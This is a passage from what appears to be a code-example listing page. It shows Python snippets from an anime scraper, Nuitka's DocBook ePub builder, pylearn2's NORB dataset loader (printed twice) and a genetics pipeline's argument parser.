				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 22

Project: Nuitka
Source File: __init__.py
View license
def DocbookEpub(env, target, source=None, *args, **kw):
    """
    A pseudo-Builder, providing a Docbook toolchain for ePub output.
    """
    import zipfile
    import shutil

    def build_open_container(target, source, env):
        """Generate the *.epub file from intermediate outputs

        Constructs the epub file according to the Open Container Format. This
        function could be replaced by a call to the SCons Zip builder if support
        was added for different compression formats for separate source nodes.
        """
        zf = zipfile.ZipFile(str(target[0]), 'w')
        mime_file = open('mimetype', 'w')
        mime_file.write('application/epub+zip')
        mime_file.close()
        zf.write(mime_file.name, compress_type = zipfile.ZIP_STORED)
        for s in source:
            if os.path.isfile(str(s)):
                head, tail = os.path.split(str(s))
                if not head:
                    continue
                s = head
            for dirpath, dirnames, filenames in os.walk(str(s)):
                for fname in filenames:
                    path = os.path.join(dirpath, fname)
                    if os.path.isfile(path):
                        zf.write(path, os.path.relpath(path, str(env.get('ZIPROOT', ''))),
                            zipfile.ZIP_DEFLATED)
        zf.close()

    def add_resources(target, source, env):
        """Add missing resources to the OEBPS directory

        Ensure all the resources in the manifest are present in the OEBPS directory.
        """
        hrefs = []
        content_file = os.path.join(source[0].abspath, 'content.opf')
        if not os.path.isfile(content_file):
            return

        hrefs = []
        if has_libxml2:
            nsmap = {'opf' : 'http://www.idpf.org/2007/opf'}
            # Read file and resolve entities
            doc = libxml2.readFile(content_file, None, 0)
            opf = doc.getRootElement()
            # Create xpath context
            xpath_context = doc.xpathNewContext()
            # Register namespaces
            for key, val in nsmap.iteritems():
                xpath_context.xpathRegisterNs(key, val)

            if hasattr(opf, 'xpathEval') and xpath_context:
                # Use the xpath context
                xpath_context.setContextNode(opf)
                items = xpath_context.xpathEval(".//opf:item")
            else:
                items = opf.findall(".//{'http://www.idpf.org/2007/opf'}item")

            for item in items:
                if hasattr(item, 'prop'):
                    hrefs.append(item.prop('href'))
                else:
                    hrefs.append(item.attrib['href'])

            doc.freeDoc()
            xpath_context.xpathFreeContext()
        elif has_lxml:
            from lxml import etree

            opf = etree.parse(content_file)
            # All the opf:item elements are resources
            for item in opf.xpath('//opf:item',
                    namespaces= { 'opf': 'http://www.idpf.org/2007/opf' }):
                hrefs.append(item.attrib['href'])

        for href in hrefs:
            # If the resource was not already created by DocBook XSL itself,
            # copy it into the OEBPS folder
            referenced_file = os.path.join(source[0].abspath, href)
            if not os.path.exists(referenced_file):
                shutil.copy(href, os.path.join(source[0].abspath, href))

    # Init list of targets/sources
    target, source = __extend_targets_sources(target, source)

    # Init XSL stylesheet
    __init_xsl_stylesheet(kw, env, '$DOCBOOK_DEFAULT_XSL_EPUB', ['epub','docbook.xsl'])

    # Setup builder
    __builder = __select_builder(__lxml_builder, __libxml2_builder, __xsltproc_builder)

    # Create targets
    result = []
    if not env.GetOption('clean'):
        # Ensure that the folders OEBPS and META-INF exist
        __create_output_dir('OEBPS/')
        __create_output_dir('META-INF/')
    dirs = env.Dir(['OEBPS', 'META-INF'])

    # Set the fixed base_dir
    kw['base_dir'] = 'OEBPS/'
    tocncx = __builder.__call__(env, 'toc.ncx', source[0], **kw)
    cxml = env.File('META-INF/container.xml')
    env.SideEffect(cxml, tocncx)

    env.Depends(tocncx, kw['DOCBOOK_XSL'])
    result.extend(tocncx+[cxml])

    container = env.Command(__ensure_suffix(str(target[0]), '.epub'),
        tocncx+[cxml], [add_resources, build_open_container])
    mimetype = env.File('mimetype')
    env.SideEffect(mimetype, container)

    result.extend(container)
    # Add supporting files for cleanup
    env.Clean(tocncx, dirs)

    return result

Example 23

Project: pylearn2
Source File: new_norb.py
View license
    def __init__(self, which_norb, which_set, image_dtype='uint8'):
        """
        Reads the specified NORB dataset from a memmap cache.
        Creates this cache first, if necessary.

        Parameters
        ----------

        which_norb : str
            Valid values: 'big' or 'small'.
            Chooses between the (big) 'NORB dataset', and the 'Small NORB
            dataset'.

        which_set : str
            Valid values: 'test', 'train', or 'both'.
            Chooses between the testing set or the training set. If 'both',
            the two datasets will be stacked together (testing data in the
            first N rows, then training data).

        image_dtype : str, or numpy.dtype
            The dtype to store image data as in the memmap cache.
            Default is uint8, which is what the original NORB files use.
        """

        if which_norb not in ('big', 'small'):
            raise ValueError("Expected which_norb argument to be either 'big' "
                             "or 'small', not '%s'" % str(which_norb))

        if which_set not in ('test', 'train', 'both'):
            raise ValueError("Expected which_set argument to be either 'test' "
                             "or 'train', not '%s'." % str(which_set))

        # This will check that dtype is a legitimate dtype string.
        image_dtype = numpy.dtype(image_dtype)

        # Maps column indices of self.y to the label type it contains.
        # Names taken from http://www.cs.nyu.edu/~ylclab/data/norb-v1.0/
        self.label_index_to_name = ('category',
                                    'instance',
                                    'elevation',
                                    'azimuth',
                                    'lighting condition')

        # Big NORB has additional label types
        if which_norb == 'big':
            self.label_index_to_name = (self.label_index_to_name +
                                        ('horizontal shift',  # in pixels
                                         'vertical shift',  # in pixels
                                         'lumination change',
                                         'contrast',
                                         'object scale',
                                         'rotation'))

        # Maps label type names to the corresponding column indices of self.y
        self.label_name_to_index = {}
        for index, name in enumerate(self.label_index_to_name):
            self.label_name_to_index[name] = index

        self.label_to_value_funcs = (get_category_value,
                                     get_instance_value,
                                     get_elevation_value,
                                     get_azimuth_value,
                                     get_lighting_value)
        if which_norb == 'big':
            self.label_to_value_funcs = (self.label_to_value_funcs +
                                         (get_horizontal_shift_value,
                                          get_vertical_shift_value,
                                          get_lumination_change_value,
                                          get_contrast_change_value,
                                          get_scale_change_value,
                                          get_rotation_change_value))

        # The size of one side of the image
        image_length = 96 if which_norb == 'small' else 108

        def read_norb_files(norb_files, output):
            """
            Reads the contents of a list of norb files into a matrix.
            Data is assumed to be in row-major order.
            """

            def read_norb_file(norb_file_path, debug=False):
                """
                Returns the numbers in a single NORB file as a 1-D ndarray.

                Parameters
                ----------

                norb_file_path : str
                  A NORB file from which to read.
                  Can be uncompressed (*.mat) or compressed (*.mat.gz).

                debug : bool
                  Set to True if you want debug printfs.
                """

                if not (norb_file_path.endswith(".mat") or
                        norb_file_path.endswith(".mat.gz")):
                    raise ValueError("Expected norb_file_path to end in "
                                     "either '.mat' or '.mat.gz'. Instead "
                                     "got '%s'" % norb_file_path)

                if not os.path.isfile(norb_file_path):
                    raise IOError("Could not find NORB file '%s' in expected "
                                  "directory '%s'." %
                                  reversed(os.path.split(norb_file_path)))

                file_handle = (gzip.open(norb_file_path)
                               if norb_file_path.endswith('.mat.gz')
                               else open(norb_file_path))

                def readNums(file_handle, num_type, count):
                    """
                    Reads some numbers from a file and returns them as a
                    numpy.ndarray.

                    Parameters
                    ----------

                    file_handle : file handle
                      The file handle from which to read the numbers.

                    num_type : str, numpy.dtype
                      The dtype of the numbers.

                    count : int
                      Reads off this many numbers.
                    """
                    num_bytes = count * numpy.dtype(num_type).itemsize
                    string = file_handle.read(num_bytes)
                    return numpy.fromstring(string, dtype=num_type)

                (elem_type,
                 elem_size,
                 _num_dims,
                 shape,
                 num_elems) = read_header(file_handle, debug)
                del _num_dims

                beginning = file_handle.tell()

                result = None
                if isinstance(file_handle, (gzip.GzipFile, bz2.BZ2File)):
                    result = readNums(file_handle,
                                      elem_type,
                                      num_elems * elem_size).reshape(shape)
                else:
                    result = numpy.fromfile(file_handle,
                                            dtype=elem_type,
                                            count=num_elems).reshape(shape)

                return result  # end of read_norb_file()

            row_index = 0
            for norb_file in norb_files:
                print("copying NORB file %s" % os.path.split(norb_file)[1])
                norb_data = read_norb_file(norb_file)
                norb_data = norb_data.reshape(-1, output.shape[1])
                end_row = row_index + norb_data.shape[0]
                output[row_index:end_row, :] = norb_data
                row_index = end_row

            assert end_row == output.shape[0]  # end of read_norb_files

        if which_norb == 'small':
            training_set_size = 24300
            testing_set_size = 24300
        else:
            assert which_norb == 'big'
            num_rows_per_file = 29160
            training_set_size = num_rows_per_file * 10
            testing_set_size = num_rows_per_file * 2

        def load_images(which_norb, which_set, dtype):
            """
            Reads image data from memmap disk cache, if available. If not, then
            first builds the memmap file from the NORB files.

            Parameters
            ----------
            which_norb : str
            'big' or 'small'.

            which_set : str
            'test', 'train', or 'both'.

            dtype : numpy.dtype
            The dtype of the image memmap cache file. If a
            cache of this dtype doesn't exist, it will be created.
            """

            assert type(dtype) == numpy.dtype

            memmap_path = get_memmap_path(which_norb, 'images_%s' % str(dtype))
            row_size = 2 * (image_length ** 2)
            shape = (training_set_size + testing_set_size, row_size)

            def make_memmap():
                dat_files = get_norb_file_paths(which_norb, 'both', 'dat')

                memmap_dir = os.path.split(memmap_path)[0]
                if not os.path.isdir(memmap_dir):
                    os.mkdir(memmap_dir)

                print("Allocating memmap file %s" % memmap_path)
                writeable_memmap = numpy.memmap(filename=memmap_path,
                                                dtype=dtype,
                                                mode='w+',
                                                shape=shape)

                read_norb_files(dat_files, writeable_memmap)

            if not os.path.isfile(memmap_path):
                print("Caching images to memmap file. This "
                      "will only be done once.")
                make_memmap()

            images = numpy.memmap(filename=memmap_path,
                                  dtype=dtype,
                                  mode='r',
                                  shape=shape)
            if which_set == 'train':
                images = images[:training_set_size, :]
            elif which_set == 'test':
                images = images[training_set_size:, :]

            return images

        def load_labels(which_norb, which_set):
            """
            Reads label data (both category and info data) from memmap disk
            cache, if available. If not, then first builds the memmap file from
            the NORB files.
            """
            memmap_path = get_memmap_path(which_norb, 'labels')
            dtype = numpy.dtype('int32')
            row_size = 5 if which_norb == 'small' else 11
            shape = (training_set_size + testing_set_size, row_size)

            def make_memmap():
                cat_files, info_files = [get_norb_file_paths(which_norb,
                                                             'both',
                                                             x)
                                         for x in ('cat', 'info')]

                memmap_dir = os.path.split(memmap_path)[0]
                if not os.path.isdir(memmap_dir):
                    os.mkdir(memmap_dir)

                print("allocating labels' memmap...")
                writeable_memmap = numpy.memmap(filename=memmap_path,
                                                dtype=dtype,
                                                mode='w+',
                                                shape=shape)
                print("... done.")

                cat_memmap = writeable_memmap[:, :1]   # 1st column
                info_memmap = writeable_memmap[:, 1:]  # remaining columns

                for norb_files, memmap in safe_zip((cat_files, info_files),
                                                   (cat_memmap, info_memmap)):
                    read_norb_files(norb_files, memmap)

            if not os.path.isfile(memmap_path):
                print("Caching images to memmap file %s.\n"
                      "This will only be done once." % memmap_path)
                make_memmap()

            labels = numpy.memmap(filename=memmap_path,
                                  dtype=dtype,
                                  mode='r',
                                  shape=shape)

            if which_set == 'train':
                labels = labels[:training_set_size, :]
            elif which_set == 'test':
                labels = labels[training_set_size:, :]

            return labels

        def get_norb_dir(which_norb):
            datasets_dir = os.getenv('PYLEARN2_DATA_PATH')
            if datasets_dir is None:
                raise RuntimeError("Please set the 'PYLEARN2_DATA_PATH' "
                                   "environment variable to tell pylearn2 "
                                   "where the datasets are.")

            if not os.path.isdir(datasets_dir):
                raise IOError("The PYLEARN2_DATA_PATH directory (%s) "
                              "doesn't exist." % datasets_dir)

            return os.path.join(datasets_dir,
                                'norb' if which_norb == 'big'
                                else 'norb_small')

        norb_dir = get_norb_dir(which_norb)

        def get_memmap_path(which_norb, file_basename):
            assert which_norb in ('big', 'small')
            assert (file_basename == 'labels' or
                    file_basename.startswith('images')), file_basename

            memmap_dir = os.path.join(norb_dir, 'memmaps_of_original')
            return os.path.join(memmap_dir, "%s.npy" % file_basename)

        def get_norb_file_paths(which_norb, which_set, norb_file_type):
            """
            Returns a list of paths for a given norb file type.

            For example,

                get_norb_file_paths('big', 'test', 'cat')

            Will return the category label files ('cat') for the big NORB
            dataset's test set.
            """

            assert which_set in ('train', 'test', 'both')

            if which_set == 'both':
                return (get_norb_file_paths(which_norb,
                                            'train',
                                            norb_file_type) +
                        get_norb_file_paths(which_norb,
                                            'test',
                                            norb_file_type))

            norb_file_types = ('cat', 'dat', 'info')
            if norb_file_type not in norb_file_types:
                raise ValueError("Expected norb_file_type to be one of %s, "
                                 "but it was '%s'" % (str(norb_file_types),
                                                      norb_file_type))

            instance_list = '01235' if which_set == 'test' else '46789'

            if which_norb == 'small':
                templates = ['smallnorb-5x%sx9x18x6x2x96x96-%sing-%%s.mat' %
                             (instance_list, which_set)]
            else:
                numbers = range(1, 3 if which_set == 'test' else 11)
                templates = ['norb-5x%sx9x18x6x2x108x108-%sing-%02d-%%s.mat' %
                             (instance_list, which_set, n) for n in numbers]

            original_files_dir = os.path.join(norb_dir, 'original')
            return [os.path.join(original_files_dir, t % norb_file_type)
                    for t in templates]

        def make_view_converter(which_norb, which_set):
            image_length = 96 if which_norb == 'small' else 108
            datum_shape = (2,  # number of images per stereo pair
                           image_length,  # image height
                           image_length,  # image width
                           1)  # number of channels
            axes = ('b', 's', 0, 1, 'c')
            return StereoViewConverter(datum_shape, axes)

        images = load_images(which_norb, which_set, image_dtype)
        labels = load_labels(which_norb, which_set)
        view_converter = make_view_converter(which_norb, which_set)

        super(NORB, self).__init__(X=images,
                                   y=labels,
                                   y_labels=numpy.max(labels) + 1,
                                   view_converter=view_converter)

        # Needed for pickling / unpickling.
        # These are set during pickling, by __getstate__()
        self.X_memmap_info = None
        self.y_memmap_info = None

Example 24

Project: pylearn2
Source File: new_norb.py
View license
    def __init__(self, which_norb, which_set, image_dtype='uint8'):
        """
        Reads the specified NORB dataset from a memmap cache.
        Creates this cache first, if necessary.

        Parameters
        ----------

        which_norb : str
            Valid values: 'big' or 'small'.
            Chooses between the (big) 'NORB dataset', and the 'Small NORB
            dataset'.

        which_set : str
            Valid values: 'test', 'train', or 'both'.
            Chooses between the testing set or the training set. If 'both',
            the two datasets will be stacked together (testing data in the
            first N rows, then training data).

        image_dtype : str, or numpy.dtype
            The dtype to store image data as in the memmap cache.
            Default is uint8, which is what the original NORB files use.
        """

        if which_norb not in ('big', 'small'):
            raise ValueError("Expected which_norb argument to be either 'big' "
                             "or 'small', not '%s'" % str(which_norb))

        if which_set not in ('test', 'train', 'both'):
            raise ValueError("Expected which_set argument to be either 'test' "
                             "or 'train', not '%s'." % str(which_set))

        # This will check that dtype is a legitimate dtype string.
        image_dtype = numpy.dtype(image_dtype)

        # Maps column indices of self.y to the label type it contains.
        # Names taken from http://www.cs.nyu.edu/~ylclab/data/norb-v1.0/
        self.label_index_to_name = ('category',
                                    'instance',
                                    'elevation',
                                    'azimuth',
                                    'lighting condition')

        # Big NORB has additional label types
        if which_norb == 'big':
            self.label_index_to_name = (self.label_index_to_name +
                                        ('horizontal shift',  # in pixels
                                         'vertical shift',  # in pixels
                                         'lumination change',
                                         'contrast',
                                         'object scale',
                                         'rotation'))

        # Maps label type names to the corresponding column indices of self.y
        self.label_name_to_index = {}
        for index, name in enumerate(self.label_index_to_name):
            self.label_name_to_index[name] = index

        self.label_to_value_funcs = (get_category_value,
                                     get_instance_value,
                                     get_elevation_value,
                                     get_azimuth_value,
                                     get_lighting_value)
        if which_norb == 'big':
            self.label_to_value_funcs = (self.label_to_value_funcs +
                                         (get_horizontal_shift_value,
                                          get_vertical_shift_value,
                                          get_lumination_change_value,
                                          get_contrast_change_value,
                                          get_scale_change_value,
                                          get_rotation_change_value))

        # The size of one side of the image
        image_length = 96 if which_norb == 'small' else 108

        def read_norb_files(norb_files, output):
            """
            Reads the contents of a list of norb files into a matrix.
            Data is assumed to be in row-major order.
            """

            def read_norb_file(norb_file_path, debug=False):
                """
                Returns the numbers in a single NORB file as a 1-D ndarray.

                Parameters
                ----------

                norb_file_path : str
                  A NORB file from which to read.
                  Can be uncompressed (*.mat) or compressed (*.mat.gz).

                debug : bool
                  Set to True if you want debug printfs.
                """

                if not (norb_file_path.endswith(".mat") or
                        norb_file_path.endswith(".mat.gz")):
                    raise ValueError("Expected norb_file_path to end in "
                                     "either '.mat' or '.mat.gz'. Instead "
                                     "got '%s'" % norb_file_path)

                if not os.path.isfile(norb_file_path):
                    raise IOError("Could not find NORB file '%s' in expected "
                                  "directory '%s'." %
                                  reversed(os.path.split(norb_file_path)))

                file_handle = (gzip.open(norb_file_path)
                               if norb_file_path.endswith('.mat.gz')
                               else open(norb_file_path))

                def readNums(file_handle, num_type, count):
                    """
                    Reads some numbers from a file and returns them as a
                    numpy.ndarray.

                    Parameters
                    ----------

                    file_handle : file handle
                      The file handle from which to read the numbers.

                    num_type : str, numpy.dtype
                      The dtype of the numbers.

                    count : int
                      Reads off this many numbers.
                    """
                    num_bytes = count * numpy.dtype(num_type).itemsize
                    string = file_handle.read(num_bytes)
                    return numpy.fromstring(string, dtype=num_type)

                (elem_type,
                 elem_size,
                 _num_dims,
                 shape,
                 num_elems) = read_header(file_handle, debug)
                del _num_dims

                beginning = file_handle.tell()

                result = None
                if isinstance(file_handle, (gzip.GzipFile, bz2.BZ2File)):
                    result = readNums(file_handle,
                                      elem_type,
                                      num_elems * elem_size).reshape(shape)
                else:
                    result = numpy.fromfile(file_handle,
                                            dtype=elem_type,
                                            count=num_elems).reshape(shape)

                return result  # end of read_norb_file()

            row_index = 0
            for norb_file in norb_files:
                print("copying NORB file %s" % os.path.split(norb_file)[1])
                norb_data = read_norb_file(norb_file)
                norb_data = norb_data.reshape(-1, output.shape[1])
                end_row = row_index + norb_data.shape[0]
                output[row_index:end_row, :] = norb_data
                row_index = end_row

            assert end_row == output.shape[0]  # end of read_norb_files

        if which_norb == 'small':
            training_set_size = 24300
            testing_set_size = 24300
        else:
            assert which_norb == 'big'
            num_rows_per_file = 29160
            training_set_size = num_rows_per_file * 10
            testing_set_size = num_rows_per_file * 2

        def load_images(which_norb, which_set, dtype):
            """
            Reads image data from memmap disk cache, if available. If not, then
            first builds the memmap file from the NORB files.

            Parameters
            ----------
            which_norb : str
            'big' or 'small'.

            which_set : str
            'test', 'train', or 'both'.

            dtype : numpy.dtype
            The dtype of the image memmap cache file. If a
            cache of this dtype doesn't exist, it will be created.
            """

            assert type(dtype) == numpy.dtype

            memmap_path = get_memmap_path(which_norb, 'images_%s' % str(dtype))
            row_size = 2 * (image_length ** 2)
            shape = (training_set_size + testing_set_size, row_size)

            def make_memmap():
                dat_files = get_norb_file_paths(which_norb, 'both', 'dat')

                memmap_dir = os.path.split(memmap_path)[0]
                if not os.path.isdir(memmap_dir):
                    os.mkdir(memmap_dir)

                print("Allocating memmap file %s" % memmap_path)
                writeable_memmap = numpy.memmap(filename=memmap_path,
                                                dtype=dtype,
                                                mode='w+',
                                                shape=shape)

                read_norb_files(dat_files, writeable_memmap)

            if not os.path.isfile(memmap_path):
                print("Caching images to memmap file. This "
                      "will only be done once.")
                make_memmap()

            images = numpy.memmap(filename=memmap_path,
                                  dtype=dtype,
                                  mode='r',
                                  shape=shape)
            if which_set == 'train':
                images = images[:training_set_size, :]
            elif which_set == 'test':
                images = images[training_set_size:, :]

            return images

        def load_labels(which_norb, which_set):
            """
            Reads label data (both category and info data) from memmap disk
            cache, if available. If not, then first builds the memmap file from
            the NORB files.
            """
            memmap_path = get_memmap_path(which_norb, 'labels')
            dtype = numpy.dtype('int32')
            row_size = 5 if which_norb == 'small' else 11
            shape = (training_set_size + testing_set_size, row_size)

            def make_memmap():
                cat_files, info_files = [get_norb_file_paths(which_norb,
                                                             'both',
                                                             x)
                                         for x in ('cat', 'info')]

                memmap_dir = os.path.split(memmap_path)[0]
                if not os.path.isdir(memmap_dir):
                    os.mkdir(memmap_dir)

                print("allocating labels' memmap...")
                writeable_memmap = numpy.memmap(filename=memmap_path,
                                                dtype=dtype,
                                                mode='w+',
                                                shape=shape)
                print("... done.")

                cat_memmap = writeable_memmap[:, :1]   # 1st column
                info_memmap = writeable_memmap[:, 1:]  # remaining columns

                for norb_files, memmap in safe_zip((cat_files, info_files),
                                                   (cat_memmap, info_memmap)):
                    read_norb_files(norb_files, memmap)

            if not os.path.isfile(memmap_path):
                print("Caching images to memmap file %s.\n"
                      "This will only be done once." % memmap_path)
                make_memmap()

            labels = numpy.memmap(filename=memmap_path,
                                  dtype=dtype,
                                  mode='r',
                                  shape=shape)

            if which_set == 'train':
                labels = labels[:training_set_size, :]
            elif which_set == 'test':
                labels = labels[training_set_size:, :]

            return labels

        def get_norb_dir(which_norb):
            datasets_dir = os.getenv('PYLEARN2_DATA_PATH')
            if datasets_dir is None:
                raise RuntimeError("Please set the 'PYLEARN2_DATA_PATH' "
                                   "environment variable to tell pylearn2 "
                                   "where the datasets are.")

            if not os.path.isdir(datasets_dir):
                raise IOError("The PYLEARN2_DATA_PATH directory (%s) "
                              "doesn't exist." % datasets_dir)

            return os.path.join(datasets_dir,
                                'norb' if which_norb == 'big'
                                else 'norb_small')

        norb_dir = get_norb_dir(which_norb)

        def get_memmap_path(which_norb, file_basename):
            assert which_norb in ('big', 'small')
            assert (file_basename == 'labels' or
                    file_basename.startswith('images')), file_basename

            memmap_dir = os.path.join(norb_dir, 'memmaps_of_original')
            return os.path.join(memmap_dir, "%s.npy" % file_basename)

        def get_norb_file_paths(which_norb, which_set, norb_file_type):
            """
            Returns a list of paths for a given norb file type.

            For example,

                get_norb_file_paths('big', 'test', 'cat')

            Will return the category label files ('cat') for the big NORB
            dataset's test set.
            """

            assert which_set in ('train', 'test', 'both')

            if which_set == 'both':
                return (get_norb_file_paths(which_norb,
                                            'train',
                                            norb_file_type) +
                        get_norb_file_paths(which_norb,
                                            'test',
                                            norb_file_type))

            norb_file_types = ('cat', 'dat', 'info')
            if norb_file_type not in norb_file_types:
                raise ValueError("Expected norb_file_type to be one of %s, "
                                 "but it was '%s'" % (str(norb_file_types),
                                                      norb_file_type))

            instance_list = '01235' if which_set == 'test' else '46789'

            if which_norb == 'small':
                templates = ['smallnorb-5x%sx9x18x6x2x96x96-%sing-%%s.mat' %
                             (instance_list, which_set)]
            else:
                numbers = range(1, 3 if which_set == 'test' else 11)
                templates = ['norb-5x%sx9x18x6x2x108x108-%sing-%02d-%%s.mat' %
                             (instance_list, which_set, n) for n in numbers]

            original_files_dir = os.path.join(norb_dir, 'original')
            return [os.path.join(original_files_dir, t % norb_file_type)
                    for t in templates]

        def make_view_converter(which_norb, which_set):
            image_length = 96 if which_norb == 'small' else 108
            datum_shape = (2,  # number of images per stereo pair
                           image_length,  # image height
                           image_length,  # image width
                           1)  # number of channels
            axes = ('b', 's', 0, 1, 'c')
            return StereoViewConverter(datum_shape, axes)

        images = load_images(which_norb, which_set, image_dtype)
        labels = load_labels(which_norb, which_set)
        view_converter = make_view_converter(which_norb, which_set)

        super(NORB, self).__init__(X=images,
                                   y=labels,
                                   y_labels=numpy.max(labels) + 1,
                                   view_converter=view_converter)

        # Needed for pickling / unpickling.
        # These are set during pickling, by __getstate__()
        self.X_memmap_info = None
        self.y_memmap_info = None

Example 25

View license
def parse_arguments():
    """ Parse the comand line arguments

        read the arguments and set sensible
        default values for the program
    """
    parser = OptionParser()
    parser.add_option('-v', '--debug',
                      action="store_true", dest='debug',
                      help="Print debug messages")
    parser.add_option('-q', '--silent', action="store_false",
                      dest='verbose', help="Run Silently")
    parser.add_option('-i', '--vcf',
                      dest='vcf_input', help="VCF input file")
    parser.add_option('-c', '--chromosome',
                      dest='chromosome', help="Chromosome")
    parser.add_option('-l', '--log-fire', dest='log_file',
                      help="Log file for the pipeline process")
    parser.add_option('--maf', dest='maf',
                      help='Minor allele-frequency filter')
    parser.add_option('--hwe', dest='hwe',
                      help="Hardy-Weinberg Equillibrium filter proportion")
    parser.add_option('--remove-missing', dest="remove_missing",
                      help="Remove missing genotypes")
    parser.add_option('--config-file', dest="config_file",
                      help="Config file")
    parser.add_option('--phased-vcf', action="store_true",
                      dest="phased_vcf", help="Phased vcf file")
    parser.add_option('--population', dest="population",
                      help="Population Code ")
    parser.add_option('--imputation', action="store_true",
                      dest="imputation", help="Imputation")
    parser.add_option('--full-process', action="store_true",
                      dest="full_process", help="Run Entire Process")
    parser.add_option('--gzvcf', action="store_true",
                      dest="vcf_gz", help="VCF input is in GZ file (optional)")
    parser.add_option('--TajimaD', dest='tajimas_d',
                      help="Output Tajima's D statistic in bins of size (bp)")
    parser.add_option('--fay-Window-Width', dest='fayandWuWindowWidth',
                      help="Sliding window width for Fay and Wu's H (kb)")
    parser.add_option('--fay-Window-Jump', dest="fayandWuWindowJump",
                      help=("Window Jump for Fay and Wus ( if fay-Window-Width"
                            " = fay-Window-Jump non-overlapping windows "
                            "are used (kb)"))
    parser.add_option('--no-clean-up', dest="no_clean_up", action="store_true",
                      help="Do not clean up intermediate datafiles")
    parser.add_option('--impute-split-size', dest='impute_split_size',
                      help="impute2 split size (Mb)")
    parser.add_option('--ehh-window-size', dest="multi_window_size",
                      help="Multicore window size (Mp)")
    parser.add_option('--ehh-overlap', dest="ehh_overlap",
                      help="EHH window overlap (Mb)")
    parser.add_option('--daf', dest='daf',
                      help="Derived Allele Frequency filter proportion")
    parser.add_option('--big-gap', dest="big_gap",
                      help=("Gap size for not calculating iHH if "
                            "core SNP spans this gap (kb)"))
    parser.add_option('--small-gap', dest='small_gap',
                      help=("Gap size for applying a penalty to "
                            "the area calculated by iHH (kb)"))
    parser.add_option('--small-gap-penalty', dest="small_gap_penalty",
                      help=("Penalty multiplier for intergration steps"
                            "in iHH see manual for formula, usually the "
                            "same as small-gap"))
    parser.add_option('--cores', dest='cores',
                      help="Override cores avaliable setting")
    parser.add_option('--no-ihs',dest='no_ihs',action="store_true"
                      , help='Disable iHS and iHH calculation')
    parser.add_option('--haps', dest='haps',
                        help="Shapeit haps file")
    parser.add_option('--sample', dest='sample',
                        help='Corresponding sample file to accompany haps')
    parser.add_option('--beagle',dest='beagle',action='store_true',
                      help="Use beagle to phase")
    parser.add_option('--no-gmap',dest="no_genetic_map",action="store_true",
                      help="Do not use a genetic map for the analysis")
    parser.add_option('--physical-ihs',dest="physical_ihs",help="Use physical map for calculating iHS",action="store_true")
    parser.add_option("--no-plots" , dest="no_plots", action="store_true",
                      help="Do not create rudimentary plots")
    parser.add_option('--version', dest = "ver", action="store_true",
                      help="Print version info")
    (options, args) = parser.parse_args()
    if(options.verbose is not None):
        if(options.debug):
            logger.setLevel(logging.DEBUG)
        else:
            logger.setLevel(logging.ERROR)
    if(options.ver is True): 
        print "Version: {0}".format(__version__)
        sys.exit(1)        

    # Obligatory arguments
    assert options.vcf_input or (options.haps and options.sample) is not None, \
        "No VCF or haps/sample file has been specified as input"
    assert options.chromosome is not None, \
        "No chromosome has been specified to the script"
    assert options.population is not None, \
        "Population code has not been specified."
    assert options.config_file is not None, \
        "Config file has not been specified."
    if(options.haps and options.sample):
        assert os.path.isfile(options.haps), \
                "Cannot locate haps file path = {0}".format(options.haps)
        assert os.path.isfile(options.sample), \
                "Cannot locate sample file path = {0}".format(options.sample)
    elif(options.vcf_input):
        assert os.path.isfile(options.vcf_input), \
                "Cannot locate vcf input file path = {0}".format(options.vcf_input) 
    if(options.fayandWuWindowJump is None):
        options.fayandWuWindowJump = str(5000)
    else:
        options.fayandWuWindowJump = str(
            int(float(options.fayandWuWindowJump) * 1e3))
    if(options.fayandWuWindowWidth is None):
        options.fayandWuWindowWidth = str(5000)
    else:
        options.fayandWuWindowWidth = str(
            int(float(options.fayandWuWindowWidth) * 1e3))
    if(options.no_clean_up is None):
        options.no_clean_up = False
    if(options.tajimas_d is None):
        options.tajimas_d = str(5000)
    else:
        options.tajimas_d = str(
            int(float(options.tajimas_d) * 1e3))
    if(options.imputation is None):
        options.imputation = False
    if(options.hwe is None):
        options.hwe = str(0.0001)
    if(options.maf is None):
        options.maf = str(0.01)
    if(options.daf is None):
        options.daf = str(0.00)
    if(options.remove_missing is None):
        options.remove_missing = str(0.99)
    if (options.phased_vcf is None):
        options.phased_vcf = False
    if (options.full_process is None):
        options.full_process = False
    if (options.vcf_gz is None):
        options.vcf_gz = False
    if (options.no_ihs is None):
        options.no_ihs = False
    if(options.log_file is None):
        options.log_file = options.population + \
            options.chromosome + "_selection_pipeline.log"
    if (options.impute_split_size is None):
        options.impute_split_size = str(5000000)
    else:
        options.impute_split_size = str(
            int(float(options.impute_split_size) * 1e6))
    if (options.multi_window_size is None):
        options.multi_window_size = str(int(5*1e6))
    else:
        options.multi_window_size = str(
            int(float(options.multi_window_size) * 1e6))
    if (options.ehh_overlap is None):
        options.ehh_overlap = str(int(2*1e6))
    else:
        options.ehh_overlap = str(
            int(float(options.ehh_overlap) * 1e6))
    if (options.big_gap is None):
        options.big_gap = str(0)
    else:
        options.big_gap = str(
            int(float(options.big_gap) * 1e3))
    if (options.small_gap is None):
        options.small_gap = str(0)
    else:
         options.small_gap = str(
            int(float(options.small_gap) * 1e3))
    if (options.small_gap_penalty is None):
        options.small_gap_penalty = str(0)
    else:
        options.small_gap_penalty = str(
            int(float(options.small_gap_penalty) * 1e3))
    if (options.no_genetic_map):
        # Must set beagle to true becasue shapeit will not
        # Work without a genetic map
        options.beagle = True
    if (options.no_plots is None):
        options.no_plots = False
    if (options.physical_ihs is None):
        options.physical_ihs = False
    return options

Example 26

View license
def parse_arguments():
    """ Parse the comand line arguments

